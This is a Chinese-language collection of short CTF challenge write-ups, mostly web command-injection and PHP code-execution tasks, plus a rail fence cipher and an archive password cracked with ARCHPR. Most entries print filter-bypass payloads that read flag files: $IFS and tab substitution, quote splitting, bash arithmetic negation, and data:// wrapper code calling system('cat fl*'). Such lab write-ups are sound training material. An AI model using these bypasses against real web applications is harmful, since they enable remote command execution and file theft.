web87
谈一谈php://filter的妙用

聪明的小羊题目描述：一只小羊翻过了2个栅栏 fa{fe13f590lg6d46d0d0}
栅栏密码，分两栏时就是flag。

web69和web68一样。
payload:
1
c=include("/flag.txt");

[SWPUCTF 2021 新生赛]我的银行卡密码
压缩包有密码，而且是6位数。用ARCHPR破解，密码是768521。

web57
题目显示flag在36.php中，而且给出cat和php了，只要想办法构造出36就可以了。
$(())是做运算，$((${_}))=0,所以只要拼接除-36之后取反就行
payload:
1
?c=$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))

web53
多过滤了一个wget，多添加了一个回显。
payload:
1
?c=ca''t${IFS}fla''g.php

web45
过滤了空格，用%09绕过，&&等于;，也可以用||和%0a。
payload:
1
2
3
/?c=tac%09fl*||
/?c=sort%09fl*||
/?c=echo%09`tac%09fla*`||

web41
这个题过滤了$、+、-、^、~使得异或自增和取反构造字符都无法使用，同时过滤了字母和数字。但是特意留了个或运算符|。
我们可以尝试从ascii为0-255的字符中，找到或运算能得到我们可用的字符的字符。

web 37
考察data伪协议，data伪协议需满足allow_url_fopen，allow_url_include同时开启才能使用。
payload：
1
/?c=data://text/plain,<?php system("cat fl*");?>

web38
php被过滤了，可以用短标签绕过php。
短标签：比更灵活调用的方法
paylaod：
1
2
?c=data://text/plain,<?=`cat fla*`;?>
/?c=data://text/plain,<?=system("cat fl*");?>

web29
过滤了flag，可以用system,echo等.
1
2
/?c=system("cat fla*");
/?c=echo`cat fl*`;

web30
多过滤了一个system，还可以用echo.
1
/?echo`cat fl*`;